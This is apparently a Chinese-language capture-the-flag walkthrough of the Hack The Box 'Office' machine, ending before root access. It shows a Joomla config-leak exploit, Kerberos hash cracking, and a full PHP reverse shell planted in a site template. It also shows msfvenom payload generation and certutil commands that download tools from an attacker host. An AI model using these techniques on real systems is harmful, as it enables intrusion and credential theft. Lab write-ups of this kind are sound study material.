Hack The Box-Office

端口扫描&信息收集

使用nmap对靶机进行扫描

nmap -sC -sV 10.10.11.3

开放了80端口，并且注意到该ip对应的域名为office.htb，将其加入到hosts文件中访问之

注意到扫描出来的还有robots文件，经过尝试后只有administrator界面是可以访问的

访问后，发现是一个Joomla的登录界面

使用默认用户名密码登录尝试后，发现登录失败，使用joomscan判断joomla的版本，查看是否存在漏洞

joomscan --url http://10.10.11.3

joomla的版本为4.2.7，存在Joomla未授权访问漏洞(CVE-2023-23752)，利用方式为直接访问/api/index.php/v1/config/application?public=true​，这里利用该漏洞

红框处有泄露用户名密码root/H0lOgrams4reTakIng0Ver754!

回想刚刚的端口扫描，靶机没有开放ssh端口，表示此处密码不能用于22端口，但是开放了445端口，或许这里是一个利用点

发现用户名密码不正确，猜测可能是用户名不正确，使用kerbrute对目标域名进行用户名爆破

./kerbrute userenum --dc 10.10.11.3 -d office.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

一个个尝试后，发现用户dwolfe能够成功连接上

smbclient -L //10.10.11.3/ -U dwolfe%H0lOgrams4reTakIng0Ver754!

逐个查看共享文件夹里边的内容，在SOC Analysis文件夹中有一个pcap文件，使用mget将其下载到本地

smbclient //10.10.11.3/SOC\ Analysis -U dwolfe%H0lOgrams4reTakIng0Ver754!

不管是tcp或者是udp流，都没有发现异常流量，但是发现了存在Kerberos流量

注意到在第二个数据包中，有如下敏感数据

此处可以使用hashcat来破解kerberos预认证数据包密码

首先能够注意到，流量包中的加密模式为18，并且wireshark告诉我们为SHA-256，在https://hashcat.net/wiki/doku.php?id=example_hashes中，我们能看到能够破解Kerberos的方式为7500，但是7500模式中的加密模式为23而并非18，继续查找，发现19900模式同样能够破解Kerberos，并且加密模式正好是18，但是19900模式仅在beta模式中存在，下载链接为https://hashcat.net/beta/

下载完成后，输入以下命令

hashcat.exe -m 19900 "$krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc" rockyou.txt

我们在密文之前传入的其他文本($krb5pa$18$tstark$OFFICE.HTB)是hashcat要使用的参数列表，使用$符号分隔，前两个只是该哈希类型的hashcat格式的一部分。
Krb5pa表示kerberos5预身份验证，18表示kerberos加密类型18(AES-256)，tstark表示用户名，可以在流量包中的其他位置找到，OFFICE.HTB表示域名，同样可以在流量包中的其他位置找到，均在上图中标注出来了

破解出来的密码在原字符串的末尾，为：playboy69

回到joomla的登录界面，尝试使用tstark/playboy69登录，发现还是不能登录，将playboy69作为定量，使用burpsuite进行爆破，结果爆破出用户名为administrator（-_-||）

进入界面后，查找功能点，发现存在system->site Templates能够修改主页代码

直接将error.php的界面改为一段反弹shell的代码

<?php
// Copyright (c) 2020 Ivan Šincek
// v2.6
// Requires PHP v5.0.0 or greater.
// Works on Linux OS, macOS, and Windows OS.
// See the original script at https://github.com/pentestmonkey/php-reverse-shell.
class Shell {private $addr  = null;private $port  = null;private $os    = null;private $shell = null;private $descriptorspec = array(0 => array('pipe', 'r'), // shell can read from STDIN1 => array('pipe', 'w'), // shell can write to STDOUT2 => array('pipe', 'w')  // shell can write to STDERR);private $buffer = 1024;  // read/write buffer sizeprivate $clen   = 0;     // command lengthprivate $error  = false; // stream read/write errorprivate $sdump  = true;  // script's dumppublic function __construct($addr, $port) {$this->addr = $addr;$this->port = $port;}private function detect() {$detected = true;$os = PHP_OS;if (stripos($os, 'LINUX') !== false || stripos($os, 'DARWIN') !== false) {$this->os    = 'LINUX';$this->shell = '/bin/sh';} else if (stripos($os, 'WINDOWS') !== false || stripos($os, 'WINNT') !== false || stripos($os, 'WIN32') !== false) {$this->os    = 'WINDOWS';$this->shell = 'cmd.exe';} else {$detected = false;echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";}return $detected;}private function daemonize() {$exit = false;if (!function_exists('pcntl_fork')) {echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";} else if (($pid = @pcntl_fork()) < 0) {echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";} else if ($pid > 0) {$exit = true;echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";// once daemonized, you will actually no longer see the script's dump} else if (posix_setsid() < 0) {echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";} else {echo "DAEMONIZE: Completed successfully!\n";}return $exit;}private function settings() {@error_reporting(0);@set_time_limit(0); // do not impose the script execution time limit@umask(0); // set the file/directory permissions - 666 for files and 777 for directories}private function dump($data) {if ($this->sdump) {$data = str_replace('<', '&lt;', $data);$data = str_replace('>', '&gt;', $data);echo $data;}}private function read($stream, $name, $buffer) {if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream$this->error = true;                            // set the global error flagecho "STRM_ERROR: Cannot read from {$name}, script will now exit...\n";}return $data;}private function write($stream, $name, $data) {if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream$this->error = true;                            // set the global error flagecho "STRM_ERROR: Cannot write to {$name}, script will now exit...\n";}return $bytes;}// read/write method for non-blocking streamsprivate function rw($input, $output, $iname, $oname) {while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length$this->dump($data); // script's dump}}// read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)// we must read the exact byte length from a stream and not a single byte moreprivate function brw($input, $output, $iname, $oname) {$size = fstat($input)['size'];if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) {// for some reason Windows OS pipes STDIN into STDOUT// we do not like that// so we need to discard the data from the streamwhile ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {$this->clen -= $bytes;$size -= $bytes;}}while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {$size -= $bytes;$this->dump($data); // script's dump}}public function run() {if ($this->detect() && !$this->daemonize()) {$this->settings();// ----- SOCKET BEGIN -----$socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);if (!$socket) {echo "SOC_ERROR: {$errno}: {$errstr}\n";} else {stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS// ----- SHELL BEGIN -----$process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);if (!$process) {echo "PROC_ERROR: Cannot start the shell\n";} else {foreach ($pipes as $pipe) {stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS}// ----- WORK BEGIN -----$status = proc_get_status($process);@fwrite($socket, "SOCKET: Shell has connected! PID: {$status['pid']}\n");do {$status = proc_get_status($process);if (feof($socket)) { // check for end-of-file on SOCKETecho "SOC_ERROR: Shell connection has been terminated\n"; break;} else if (feof($pipes[1]) || !$status['running']) {                 // check for end-of-file on STDOUT or if process is still runningecho "PROC_ERROR: Shell process has been terminated\n";   break; // feof() does not work with blocking streams}                                                                    // use proc_get_status() instead$streams = array('read'   => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR'write'  => null,'except' => null);$num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], 0); // wait for stream changes | will not wait on Windows OSif ($num_changed_streams === false) {echo "STRM_ERROR: stream_select() failed\n"; break;} else if ($num_changed_streams > 0) {if ($this->os === 'LINUX') {if (in_array($socket  , $streams['read'])) { $this->rw($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDINif (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKETif (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET} else if ($this->os === 'WINDOWS') {// order is importantif (in_array($socket, $streams['read'])/*------*/) { $this->rw ($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDINif (($fstat = fstat($pipes[2])) && $fstat['size']) { $this->brw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKETif (($fstat = fstat($pipes[1])) && $fstat['size']) { $this->brw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET}}} while (!$this->error);// ------ WORK END ------foreach ($pipes as $pipe) {fclose($pipe);}proc_close($process);}// ------ SHELL END ------fclose($socket);}// ------ SOCKET END ------}}
}
echo '<pre>';
// change the host address and/or port number as necessary
$sh = new Shell('IP',PORT);
$sh->run();
unset($sh);
// garbage collector requires PHP v5.3.0 or greater
// @gc_collect_cycles();
echo '</pre>';
?>

修改完成后保存，访问该界面

拿到shell

权限提升

查看当前用户权限

发现还不是用户权限，先想办法提升到用户权限，查看靶机中有哪些用户

发现有之前爆破出密码的tstark用户，使用RunasCs进行提权，先使用msfvenom生成一个payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe -o payload.exe

将本地的RunasCs和payload上传到靶机

certutil.exe -urlcache -split -f http://10.10.14.2:8989/RunasCs.exe
certutil.exe -urlcache -split -f http://10.10.14.2:8989/payload.exe

使用RunasCs以tstark用户运行payload.exe，并且在msfconsole开启监听

RunasCs.exe tstark playboy69 payload.exe

成功拿到用户权限

-------------------------------root权限待更新-------------------------------